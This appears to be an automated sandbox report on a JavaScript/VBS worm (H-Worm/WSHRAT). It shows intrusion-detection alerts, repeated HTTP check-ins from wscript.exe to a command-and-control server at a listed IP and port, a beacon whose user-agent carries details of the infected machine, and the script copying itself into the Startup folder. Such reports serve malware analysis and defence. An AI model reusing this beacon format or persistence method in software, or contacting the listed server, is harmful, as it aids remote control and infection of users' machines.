    2025-01-02T22:38:17.078458+01002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.449954154.216.18.177181TCP
    2025-01-02T22:38:17.078458+01002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.449954154.216.18.177181TCP
    2025-01-02T22:38:25.048305+01002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.450004154.216.18.177181TCP
    2025-01-02T22:38:25.048305+01002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.450004154.216.18.177181TCP
    2025-01-02T22:38:32.124707+01002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.450005154.216.18.177181TCP
    2025-01-02T22:38:32.124707+01002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.450005154.216.18.177181TCP
    2025-01-02T22:38:39.110742+01002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.450006154.216.18.177181TCP
    2025-01-02T22:38:39.110742+01002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.450006154.216.18.177181TCP
    2025-01-02T22:38:46.063218+01002017516ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 11192.168.2.450007154.216.18.177181TCP
    2025-01-02T22:38:46.063218+01002017994ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA1192.168.2.450007154.216.18.177181TCP
    TimestampSource PortDest PortSource IPDest IP
    Jan 2, 2025 22:38:15.392734051 CET499547181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:15.397525072 CET718149954154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:15.397680998 CET499547181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:15.397758007 CET499547181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:15.402472019 CET718149954154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:17.077611923 CET718149954154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:17.078458071 CET499547181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:17.078458071 CET499547181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:17.083242893 CET718149954154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:23.349967957 CET500047181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:23.354820967 CET718150004154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:23.354904890 CET500047181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:23.355098009 CET500047181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:23.359920025 CET718150004154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:25.047077894 CET718150004154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:25.048305035 CET500047181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:25.048387051 CET500047181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:25.053384066 CET718150004154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:30.417855024 CET500057181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:30.422826052 CET718150005154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:30.422900915 CET500057181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:30.423075914 CET500057181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:30.427823067 CET718150005154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:32.124610901 CET718150005154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:32.124706984 CET500057181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:32.124779940 CET500057181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:32.130271912 CET718150005154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:37.417898893 CET500067181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:37.422776937 CET718150006154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:37.422863960 CET500067181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:37.423029900 CET500067181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:37.427830935 CET718150006154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:39.110580921 CET718150006154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:39.110742092 CET500067181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:39.110742092 CET500067181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:39.115592957 CET718150006154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:44.378612995 CET500077181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:44.383555889 CET718150007154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:44.383637905 CET500077181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:44.383780003 CET500077181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:44.388556004 CET718150007154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:46.063126087 CET718150007154.216.18.17192.168.2.4
    Jan 2, 2025 22:38:46.063218117 CET500077181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:46.063304901 CET500077181192.168.2.4154.216.18.17
    Jan 2, 2025 22:38:46.068214893 CET718150007154.216.18.17192.168.2.4
    • 154.216.18.17:7181
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.449954154.216.18.1771817672C:\Windows\System32\wscript.exe
    TimestampBytes transferredDirectionData
    Jan 2, 2025 22:38:15.397758007 CET320OUTPOST /is-ready HTTP/1.1
    Accept: */*
    user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 154.216.18.17:7181
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.450004154.216.18.1771817672C:\Windows\System32\wscript.exe
    TimestampBytes transferredDirectionData
    Jan 2, 2025 22:38:23.355098009 CET320OUTPOST /is-ready HTTP/1.1
    Accept: */*
    user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 154.216.18.17:7181
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.450005154.216.18.1771817672C:\Windows\System32\wscript.exe
    TimestampBytes transferredDirectionData
    Jan 2, 2025 22:38:30.423075914 CET320OUTPOST /is-ready HTTP/1.1
    Accept: */*
    user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 154.216.18.17:7181
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.450006154.216.18.1771817672C:\Windows\System32\wscript.exe
    TimestampBytes transferredDirectionData
    Jan 2, 2025 22:38:37.423029900 CET320OUTPOST /is-ready HTTP/1.1
    Accept: */*
    user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 154.216.18.17:7181
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.450007154.216.18.1771817672C:\Windows\System32\wscript.exe
    TimestampBytes transferredDirectionData
    Jan 2, 2025 22:38:44.383780003 CET320OUTPOST /is-ready HTTP/1.1
    Accept: */*
    user-agent: B81A4609<|>user-PC<|>user<|>Microsoft Windows 10 Pro<|>Plus<|>Windows Defender .<|>false - 2/1/2025
    Accept-Language: en-ch
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 154.216.18.17:7181
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:16:36:40
    Start date:02/01/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RBI-MontaryFramework.js"
    Imagebase:0x7ff77aad0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:16:37:03
    Start date:02/01/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Imagebase:0x7ff77aad0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:5
    Start time:16:37:15
    Start date:02/01/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Imagebase:0x7ff77aad0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:16:37:23
    Start date:02/01/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\RBI-MontaryFramework.js"
    Imagebase:0x7ff77aad0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:7
    Start time:16:37:31
    Start date:02/01/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RBI-MontaryFramework.js"
    Imagebase:0x7ff77aad0000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly